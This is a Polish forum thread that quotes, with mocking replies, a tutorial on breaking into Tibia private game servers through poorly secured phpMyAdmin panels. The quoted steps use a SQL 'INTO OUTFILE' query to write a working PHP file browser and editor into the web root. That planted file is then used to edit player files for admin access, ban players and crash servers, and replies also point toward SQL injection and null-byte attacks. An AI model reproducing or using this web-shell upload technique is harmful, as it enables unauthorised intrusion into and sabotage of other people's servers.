[TuT] phpmyadmin

[melto1]

Nosz kurna mać. Masz opisane zarąbiście ładnie i jeszcze nie wiesz co jak się robi? No bez jaj curuś ... Więc tak:

 

masz stronę, np. www.exodis.pl ( moj ulubiony server ) i dopisujesz do niego poprostu /phpmyadmin --> www.exodis.pl/phpmyadmin. I człowieku zrozum, że IP w postaci ip servera do otsa, tez jest jego linkiem do strony. Takze mam nadzieję, że teraz zrozumiałeś.

[kusiu67]

troszeczke opanuj sie chłopczyku.

[ersiu]

2. Np. mamy superots.org (przykładowy link ) dopisujemy /phpmyadmin/ wychodzi coś w tym stylu www.superots.org/phpmyadmin/

A co ma wyjść, skoro dopiszesz do adresu? o ; może byś napisał, że jeżeli istnieje to wczyta się strona z phpMyAdminem....

 

4. Jeżeli udało nam się zalogować ( tzn jeżeli znaleźliśmy no0obski serwer ) to klikamy na dowolna baze danych np mysql oraz zakładkę SQL

nie trzeba wybierać bazy danych, nad bazami danych masz ikonkę zapytań do SQL.

 

5. Teraz otwieramy nową kartę w przeglądarce i do linku dopisujemy byle co w naszym przypadku otrzymamy www.superots.org/byleco <img src="style_emoticons/<#EMO_DIR#>/biggrin.gif" style="vertical-align:middle" emoid="" border="0" alt="biggrin.gif" /> .Powinno się wyświetlić na jakim programie jest postawiona strona

Łoł, a wiesz, że w tym słynnym PMA mamy także zakładkę "Zmienne systemowe", gdzie jest podana dokładna ścieżka?

 

6. Nazwy folderów dla 3 najczęściej używanych programów (moim zdaniem <img src="style_emoticons/<#EMO_DIR#>/tongue.gif" style="vertical-align:middle" emoid=":P" border="0" alt="tongue.gif" />)

www - AppServ

httpd - WebServ

htdocs - Xampp

A EasyPHP, UniServer, Krasnal, NetServer i wiele innych, które teraz używane są przez otsy, oraz apache na modnym teraz linuksie?

 

7. Zamykamy już kartę (tą nowo otwartą) i tam gdzie to okienko wpisujemy <div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>select 'zawartość' into outfile './../../folder/plik.php';

No i jak dobrze pójdzie to wgrasz plik na pulpicie! zamiast "./../../folder/plik.php" wpiszcie sciezke... np. "/root/site/lol.php";

 

select '<?php $q = $_GET["q"]; if ($q == ""){ $katalog = opendir("./"); } else { $katalog = opendir("$q"); } while ($plik = strtolower(readdir($katalog))) { if ($plik<>"." && $plik<>".." && $plik<>"edytuj.php" ) $lista[]=$plik; } closedir($katalog); if (count($lista)>0) { echo "Wybierz plik do edycji:"; sort($lista); } for ($i=0;$i<count($lista);$i++) { echo "<br />Edytuj plik <b>$lista[$i]</b> <a href=edytuj.php?edycja=$lista[$i]>Edytuj plik</a>"; } $edycja = $_REQUEST["edycja"]; if (isset($_POST["tekst"]) && file_exists($edycja)) { $f = fopen($edycja, "w"); fputs($f, stripslashes($_POST["tekst"])); fclose($f); } if ($edycja<>"" && file_exists($edycja)) { echo "<p> </p>Edycja plik: <b>$edycja</b>"; echo "<form action=edytuj.php method=post><input type=hidden name=edycja value=".$edycja." /><textarea name=tekst rows=20 cols=50>"; $f = fopen($edycja,"r"); while(!feof($f)) echo fread($f,1024); fclose($f); echo "</textarea><input type=submit value=Zapisz /></form>"; } ?>' into outfile './../../folder/edytuj.php';</div>

Tak, tak, "fread" rządzi. nie lepiej wgrać shellcode z prawdziwego zdarzenia, niż "gówno pseudo-programisty"?

 

t

9. Dobra tera wbijacie się na stronkę i do linku dopiszcie /edytuj.php w naszym przypadku superots.org/edytuj.php

tera szukacie folderu z ots potem /data/players i edytujecie plik twojnick.xml w acess (czy jakoś tak... nie gram w tibie ) piszecie 5 albo 6 zależy od serwa chyba

acha aby przechodzic do innych katalogów dopiszcie do linku ?q=sciezka np. superots.org/edytuj.php?q=C:/

 

10. Wbijacie na tibie cieszycie sie chile ownerujecie all domki i crashujecie serwa acha oczywiscie all ban

a co z otsami z bazami MySQL... tam nie ma folderu "players" huehe... banujcie, crashujcie, ownerujcie? a pod koniec powiedzcie jakimi jesteście ciotami, żeby używać takich metod o ;

 

 

Poradnik napisany dennie, zerowa wiedza autorstwa o czym pisze. nauczył się prostego triku, a zapewne nie wie jak to działa.

Jeżeli chcecie się pobawić naprawde to na ots'ach często się spotyka też SQL Injection oraz nullbyte. to najprostsze metody włamania, pobawcie się, pokombinujcie, a nie używajcie

trików pseudo-h44xuf.